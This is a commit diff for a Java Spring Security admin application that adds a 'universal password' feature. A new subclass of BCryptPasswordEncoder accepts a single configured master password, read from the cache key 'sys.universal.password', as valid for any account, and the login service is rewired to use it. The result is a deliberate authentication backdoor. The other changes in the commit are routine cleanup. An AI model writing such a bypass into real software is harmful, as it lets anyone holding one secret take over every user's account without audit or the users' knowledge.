支持万能密码

1 week ago · a2d4bf58ca
parent 9ef678c96f
commit a2d4bf58ca
9 changed files with 117 additions and 22 deletions
--- a/sync-admin/src/main/java/com/lyr/RuoYiApplication.java
+++ b/sync-admin/src/main/java/com/lyr/RuoYiApplication.java
@ -14,15 +14,7 @@ public class RuoYiApplication {
    public static void main(String[] args) {
        // System.setProperty("spring.devtools.restart.enabled", "false");
        SpringApplication.run(RuoYiApplication.class, args);
-        System.out.println("(♥◠‿◠)ﾉﾞ  若依启动成功   ლ(´ڡ`ლ)ﾞ  \n" +
-                " .-------.       ____     __        \n" +
-                " |  _ _   \\      \\   \\   /  /    \n" +
-                " | ( ' )  |       \\  _. /  '       \n" +
-                " |(_ o _) /        _( )_ .'         \n" +
-                " | (_,_).' __  ___(_ o _)'          \n" +
-                " |  |\\ \\  |  ||   |(_,_)'         \n" +
-                " |  | \\ `'   /|   `-'  /           \n" +
-                " |  |  \\    /  \\      /           \n" +
-                " ''-'   `'-'    `-..-'              ");
+        System.out.println("(♥◠‿◠)ﾉﾞ  启动成功   ლ(´ڡ`ლ)ﾞ");
+
    }
 }
--- a/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java
+++ b/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java
@ -0,0 +1,46 @@
+package com.lyr.framework.config;
+
+import com.lyr.common.utils.StringUtils;
+import lombok.NoArgsConstructor;
+import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
+
+/**
+ * BCryptPasswordEncoder 增强
+ *
+ * @author liyc
+ * @date 2024/10/31
+ * @description TODO
+ **/
+@NoArgsConstructor
+public class BCryptPasswordEncoderEx extends BCryptPasswordEncoder {
+
+
+    /**
+     * 万能密码
+     */
+    private static String universalPassword;
+
+    public static void setUniversalPassword(String universalPassword) {
+        BCryptPasswordEncoderEx.universalPassword = universalPassword;
+    }
+
+    /**
+     * 密码比较
+     *
+     * @param rawPassword
+     * @param encodedPassword
+     * @return
+     */
+    @Override
+    public boolean matches(CharSequence rawPassword, String encodedPassword) {
+        if (StringUtils.isNotEmpty(universalPassword)) {
+            boolean equals = universalPassword.equals(rawPassword.toString());
+            if (equals) {
+                return true;
+            }
+        }
+        return super.matches(rawPassword, encodedPassword);
+    }
+
+
+}
--- a/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java
+++ b/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java
@ -1,10 +1,13 @@
 package com.lyr.framework.config;

+import com.lyr.common.core.redis.RedisCache;
 import com.lyr.framework.config.properties.PermitAllUrlProperties;
 import com.lyr.framework.security.filter.JwtAuthenticationTokenFilter;
 import com.lyr.framework.security.handle.AuthenticationEntryPointImpl;
 import com.lyr.framework.security.handle.LogoutSuccessHandlerImpl;
+import com.lyr.system.service.ISysConfigService;
 import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.autoconfigure.condition.ConditionalOnBean;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.http.HttpMethod;
@ -15,7 +18,6 @@ import org.springframework.security.config.annotation.method.configuration.Enabl
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
 import org.springframework.security.config.http.SessionCreationPolicy;
 import org.springframework.security.core.userdetails.UserDetailsService;
-import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
 import org.springframework.security.web.SecurityFilterChain;
 import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
 import org.springframework.security.web.authentication.logout.LogoutFilter;
@ -65,6 +67,7 @@ public class SecurityConfig {
    @Autowired
    private PermitAllUrlProperties permitAllUrl;

+
    /**
     * 身份验证实现
     */
@ -110,9 +113,7 @@ public class SecurityConfig {
                    // 对于登录login 注册register 验证码captchaImage 允许匿名访问
                    requests.antMatchers("/login", "/register", "/captchaImage").permitAll()
                            // 静态资源，可匿名访问
-                            .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll()
-                            .antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll()
-                            .antMatchers("/gather/*", "/gather/**").permitAll()
+                            .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll().antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll().antMatchers("/gather/*", "/gather/**").permitAll()
                            // 除上面外的所有请求全部需要鉴权认证
                            .anyRequest().authenticated();
                })
@ -121,16 +122,17 @@ public class SecurityConfig {
                // 添加JWT filter
                .addFilterBefore(authenticationTokenFilter, UsernamePasswordAuthenticationFilter.class)
                // 添加CORS filter
-                .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class)
-                .addFilterBefore(corsFilter, LogoutFilter.class)
-                .build();
+                .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class).addFilterBefore(corsFilter, LogoutFilter.class).build();
    }

    /**
     * 强散列哈希加密实现
+     * PlmV1
     */
    @Bean
-    public BCryptPasswordEncoder bCryptPasswordEncoder() {
-        return new BCryptPasswordEncoder();
+    @ConditionalOnBean({ISysConfigService.class, RedisCache.class})
+    public BCryptPasswordEncoderEx bCryptPasswordEncoder() {
+        return new BCryptPasswordEncoderEx();
    }
+
 }
--- a/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java
+++ b/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java
@ -90,7 +90,7 @@ public class DataSourceManager {
            JdbcTemplate jdbcTemplate = new JdbcTemplate(dataSource);
            Integer result = jdbcTemplate.queryForObject("SELECT 1", Integer.class);
            if (result != null && result == 1) {
-                log.info(String.format("数据源连接测试通过 %s", dataSourceName));
+                log.debug(String.format("数据源连接测试通过 %s", dataSourceName));
            } else {
                log.error(message);
                throw new ServiceException(message);
--- a/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java
+++ b/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java
@ -5,13 +5,15 @@ import com.lyr.common.core.domain.entity.SysUser;
 import com.lyr.common.core.redis.RedisCache;
 import com.lyr.common.exception.user.UserPasswordNotMatchException;
 import com.lyr.common.exception.user.UserPasswordRetryLimitExceedException;
-import com.lyr.common.utils.SecurityUtils;
+import com.lyr.framework.config.BCryptPasswordEncoderEx;
 import com.lyr.framework.security.context.AuthenticationContextHolder;
+import com.lyr.system.service.ISysConfigService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.security.core.Authentication;
 import org.springframework.stereotype.Component;

+import javax.annotation.Resource;
 import java.util.concurrent.TimeUnit;

 /**
@ -30,6 +32,9 @@ public class SysPasswordService {
    @Value(value = "${user.password.lockTime}")
    private int lockTime;

+    @Resource
+    private ISysConfigService iSysConfigService;
+
    /**
     * 登录账户密码错误次数缓存键名
     *
@ -65,7 +70,10 @@ public class SysPasswordService {
    }

    public boolean matches(SysUser user, String rawPassword) {
-        return SecurityUtils.matchesPassword(rawPassword, user.getPassword());
+        String universalPassword = iSysConfigService.getConfigCache("sys.universal.password");
+        BCryptPasswordEncoderEx bCryptPasswordEncoderEx = new BCryptPasswordEncoderEx();
+        bCryptPasswordEncoderEx.setUniversalPassword(universalPassword);
+        return bCryptPasswordEncoderEx.matches(rawPassword, user.getPassword());
    }

    public void clearLoginRecordCache(String loginName) {
--- a/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java
+++ b/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java
@ -63,8 +63,11 @@ public class DataSourceConfigServiceImpl extends ServiceImpl<DataSourceConfigMap

    }

+
    @Override
    public void list(String datasourceName, Object o) {
        tSupplierMapper.list(datasourceName);
    }
+
+
 }
--- a/sync-gather/target/generated-sources/annotations/com/lyr/gather/convert/DataSourceConfigConvertImpl.java
+++ b/sync-gather/target/generated-sources/annotations/com/lyr/gather/convert/DataSourceConfigConvertImpl.java
@ -0,0 +1,28 @@
+package com.lyr.gather.convert;
+
+import com.alibaba.druid.pool.DruidDataSource;
+import com.lyr.gather.domain.DataSourceConfigDTO;
+import javax.annotation.Generated;
+
+@Generated(
+    value = "org.mapstruct.ap.MappingProcessor",
+    date = "2024-10-31T16:39:16+0800",
+    comments = "version: 1.6.2, compiler: javac, environment: Java 1.8.0_392 (Amazon.com Inc.)"
+)
+public class DataSourceConfigConvertImpl implements DataSourceConfigConvert {
+
+    @Override
+    public DruidDataSource convert(DataSourceConfigDTO bean) {
+        if ( bean == null ) {
+            return null;
+        }
+
+        DruidDataSource druidDataSource = new DruidDataSource();
+
+        druidDataSource.setName( bean.getName() );
+        druidDataSource.setUsername( bean.getUsername() );
+        druidDataSource.setPassword( bean.getPassword() );
+
+        return druidDataSource;
+    }
+}
--- a/sync-system/src/main/java/com/lyr/system/service/ISysConfigService.java
+++ b/sync-system/src/main/java/com/lyr/system/service/ISysConfigService.java
@ -64,6 +64,14 @@ public interface ISysConfigService {
     */
    void deleteConfigByIds(Long[] configIds);

+
+    /**
+     * 获取参数缓存对象
+     *
+     * @return
+     */
+    String getConfigCache(String configKey);
+
    /**
     * 加载参数缓存数据
     */
--- a/sync-system/src/main/java/com/lyr/system/service/impl/SysConfigServiceImpl.java
+++ b/sync-system/src/main/java/com/lyr/system/service/impl/SysConfigServiceImpl.java
@ -152,6 +152,7 @@ public class SysConfigServiceImpl implements ISysConfigService {
        }
    }

+
    /**
     * 加载参数缓存数据
     */
@ -163,6 +164,13 @@ public class SysConfigServiceImpl implements ISysConfigService {
        }
    }

+
+    @Override
+    public String getConfigCache(String configKey) {
+        Object value = redisCache.getCacheObject(getCacheKey(configKey));
+        return value != null ? value.toString() : null;
+    }
+
    /**
     * 清空参数缓存数据
     */